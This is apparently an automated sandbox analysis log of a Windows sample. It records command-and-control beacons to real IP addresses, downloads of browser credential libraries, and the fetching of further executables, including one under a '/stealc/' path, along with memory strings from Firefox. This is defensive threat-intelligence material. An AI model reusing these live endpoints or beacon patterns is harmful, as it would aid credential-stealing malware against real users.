Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 39 41 34 34 32 43 33 46 46 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCF9A442C3FFFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View IP Address: 185.215.113.19 185.215.113.19
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/freebl3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/mozglue.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/msvcp140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/nss3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/softokn3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /8405906461a5200c/vcruntime140.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.facebook.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA15F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "url": "https://www.youtube.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001E.00000002.3049538912.00000270DA12A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3049538912.00000270DA18F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "default.sites": "https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/", equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlYou must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6DE7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: WHERE place_id = (SELECT id FROM moz_places WHERE url_hash = hash(:urlYou must provide a target ID as the second parameter of AlsoToOneContent. If you want to send to all content processes, use BroadcastToContenthttps://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3077664321.00000270DC61F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001D.00000002.2958630660.0000014A6E160000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2952270255.00000158A7AC0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3030803173.00000270C9930000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3031269537.00000270C9B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001E.00000002.3036698382.00000270D6D03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://connect.facebook.net/*/sdk.js*FileUtils_closeSafeFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1*://web-assets.toggl.com/app/assets/scripts/*.js*://connect.facebook.net/*/all.js**://www.google-analytics.com/gtm/js**://*.imgur.io/js/vendor.*.bundle.js*://c.amazon-adsystem.com/aax2/apstag.js*://www.everestjs.net/static/st.v3.js**://auth.9c9media.ca/auth/main.js*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.js*://cdn.branch.io/branch-latest.min.js*webcompat-reporter@mozilla.org.xpi*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.jsFileUtils_closeAtomicFileOutputStream*://www.google-analytics.com/analytics.js**://www.googletagmanager.com/gtm.js**://www.google-analytics.com/plugins/ua/ec.jshttps://smartblock.firefox.etp/play.svg*://track.adform.net/serving/scripts/trackpoint/*://static.chartbeat.com/js/chartbeat_video.jsresource://gre/modules/FileUtils.sys.mjs@mozilla.org/addons/addon-manager-startup;1*://www.rva311.com/static/js/main.*.chunk.jsresource://gre/modules/addons/XPIProvider.jsm*://ssl.google-analytics.com/ga.js*://s0.2mdn.net/instream/html5/ima3.js*://pub.doubleverify.com/signals/pub.js*https://smartblock.firefox.etp/facebook.svgpictureinpicture%40mozilla.org:1.0.0*://cdn.adsafeprotected.com/iasPET.1.js*://static.adsafeprotected.com/iasPET.1.js*://adservex.media.net/videoAds.js*browser:purge-session-history-for-domain equals www.facebook.com (Facebook)
